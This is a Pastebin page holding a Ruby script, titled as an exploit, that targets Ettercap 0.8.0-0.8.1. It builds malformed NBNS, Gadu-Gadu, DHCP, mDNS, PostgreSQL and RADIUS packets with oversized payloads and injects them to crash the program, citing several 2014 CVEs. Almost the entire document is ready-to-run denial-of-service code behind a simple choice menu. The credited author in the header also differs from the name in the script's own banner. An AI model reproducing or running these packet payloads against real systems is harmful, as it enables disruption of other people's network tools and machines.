API tools faq
paste
Advertisement
Guest User

Ettercap 0.8.0-0.8.1 - multiple Denial of Service Vulnerabil

a guest
Dec 20th, 2014
213
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.17 KB | None | 0 0
raw download clone embed print report
  1. #Exploit Title: 6 Remote ettercap Dos exploits to 1
  2. #Date: 19/12/2014
  3. #Exploit Author: Marko Armitage
  4. #Vendor Homepage: http://ettercap.github.io
  5. #Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
  6. #Version: 8.0-8.1
  7. #Tested on: Linux
  8. #CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
  9. #Make sure that you have installed packefu and pcaprub
  10.  
  11. require 'packetfu'
  12. include PacketFu
  13.  
  14. if ARGV.count < 4
  15. puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
  16. puts "[-]Use valid mac for your interface, if you dont know"+
  17. " victim's ip address use broadcast"
  18. exit
  19. end
  20.  
  21. def nbns_header
  22. u = UDPPacket.new()
  23. u.eth_saddr = ARGV[2]
  24. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  25. u.ip_daddr = ARGV[1]
  26. u.ip_saddr = ARGV[0]
  27. u.udp_src = 4444
  28. u.udp_dst = 137
  29. u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
  30. u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
  31. u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
  32. u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
  33. u.payload << "\x00\x20" #type
  34. u.payload << "\x00\x01" #class
  35. u.payload << "A"*1000 #pad
  36. u.recalc
  37. u.to_w(ARGV[3])
  38. end
  39. def gg_client
  40. u = TCPPacket.new()
  41. u.eth_saddr = ARGV[2]
  42. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  43. u.ip_saddr = ARGV[0]
  44. u.ip_daddr = ARGV[1]
  45. u.tcp_src = 3333
  46. u.tcp_dst = 8074
  47. u.payload = "\x15\x00\x00\x00" #gg_type
  48. u.payload << "\xe8\x03\x00\x00" #gg_len
  49. u.payload << "A"*1000
  50. u.recalc
  51. u.to_w(ARGV[3])
  52. end
  53. def dhcp_header
  54. u = UDPPacket.new()
  55. u.eth_saddr = ARGV[2]
  56. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  57. u.ip_daddr = ARGV[0]
  58. u.ip_saddr = ARGV[1]
  59. u.udp_src = 67
  60. u.udp_dst = 4444
  61. u.payload = "\x02"*236
  62. u.payload << "\x63\x82\x53\x63"
  63. u.payload << "\x35"
  64. u.payload << "\x00\x05\x00"
  65. u.payload << "\x51"
  66. u.payload << "\x00" #size
  67. u.payload << "A" * 3 #pad
  68. u.recalc
  69. u.to_w(ARGV[3])
  70. end
  71.  
  72. def mdns_header
  73. u = UDPPacket.new()
  74. u.eth_saddr = ARGV[2]
  75. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  76. u.ip_daddr = ARGV[1]
  77. u.ip_saddr = ARGV[0]
  78. u.udp_src = 4444
  79. u.udp_dst = 5353
  80. u.payload = "\x11\x11" #id
  81. u.payload << "\x00\x00" #flags
  82. u.payload << "\x00\x01" #questions
  83. u.payload << "\x00\x00" #answer_rr
  84. u.payload << "\x00\x00" #auth_rrs
  85. u.payload << "\x00\x00" #additional_rr
  86. u.payload << "\x06router\x05local\x00" #name
  87. u.payload << "\x00\x01" #type
  88. u.payload << "\x00\x01" #class
  89. u.recalc
  90. u.to_w(ARGV[3])
  91. end
  92. def mdns_dos_header
  93. u = UDPPacket.new()
  94. u.eth_saddr = ARGV[2]
  95. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  96. u.ip_daddr = ARGV[1]
  97. u.ip_saddr = ARGV[0]
  98. u.udp_src = 4444
  99. u.udp_dst = 5353
  100. u.payload = "\x11\x11" #id
  101. u.payload << "\x00\x00" #flags
  102. u.payload << "\x00\x01" #questions
  103. u.payload << "\x00\x00" #answer_rr
  104. u.payload << "\x00\x00" #auth_rrs
  105. u.payload << "\x00\x00" #additional_rr
  106. u.payload << "\x01"
  107. u.payload << "\x00\x01" #type
  108. u.payload << "\x00\x01" #class
  109. u.payload << "A"*500
  110. u.recalc
  111. u.to_w(ARGV[3])
  112. end
  113.  
  114. def pgsql_server
  115. u = TCPPacket.new()
  116. u.eth_saddr = ARGV[2]
  117. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  118. u.ip_saddr = ARGV[1]
  119. u.ip_daddr = ARGV[0]
  120. u.tcp_src = 5432
  121. u.tcp_dst = 3333
  122. u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  123. u.recalc
  124. u.to_w(ARGV[3])
  125. end
  126. def pgsql_client
  127. u = TCPPacket.new()
  128. u.eth_saddr = ARGV[2]
  129. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  130. u.ip_saddr = ARGV[0]
  131. u.ip_daddr = ARGV[1]
  132. u.tcp_src = 3333
  133. u.tcp_dst = 5432
  134. u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  135. u.recalc
  136. u.to_w(ARGV[3])
  137. end
  138.  
  139. def pgsql_client_shell
  140. u = TCPPacket.new()
  141. u.eth_saddr = ARGV[2]
  142. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  143. u.ip_saddr = ARGV[0]
  144. u.ip_daddr = ARGV[1]
  145. u.tcp_src = 3333
  146. u.tcp_dst = 5432
  147. u.payload = "\x70"
  148. u.payload << "\x00\x00\x03\xe9" #len
  149. u.payload << "A"*1000
  150. u.payload << "\x00"
  151. u.recalc
  152. u.to_w(ARGV[3])
  153. end
  154.  
  155. def radius_header
  156. u = UDPPacket.new()
  157. u.eth_saddr = ARGV[2]
  158. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  159. u.ip_daddr = ARGV[1]
  160. u.ip_saddr = ARGV[0]
  161. u.udp_src = 4444
  162. u.udp_dst = 1645
  163. u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
  164. u.recalc
  165. u.to_w(ARGV[3])
  166. end
  167.  
  168. puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
  169. puts "[+]-1- nbns plugin CVE-2014-9377"
  170. puts "[+]-2- gg dissector CVE-2014-9376"
  171. puts "[+]-3- dhcp dissector CVE-2014-9376"
  172. puts "[+]-4- mdns plugin CVE-2014-9378"
  173. puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
  174. puts "[+]-6- radius dissector CVE-2014-9379"
  175. print "choice:"
  176. choice = $stdin.gets.chomp().to_i()
  177.  
  178. case choice
  179. when 1
  180. puts "[+]Sending nbns packet.."
  181. nbns_header
  182. when 2
  183. puts "[+]Sending client gg packet.."
  184. gg_client
  185. when 3
  186. puts "[+]Sending dhcp packet.."
  187. dhcp_header
  188. when 4
  189. puts "[+]Sending mdns packet.."
  190. mdns_header
  191. mdns_dos_header
  192. when 5
  193. puts "[+]Sending pgsql packet.."
  194. pgsql_client
  195. pgsql_server
  196. pgsql_client_shell
  197. when 6
  198. puts "[+]Sending radius packet.."
  199. radius_header
  200. else
  201. puts "[-]Unrecognized command "
  202. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!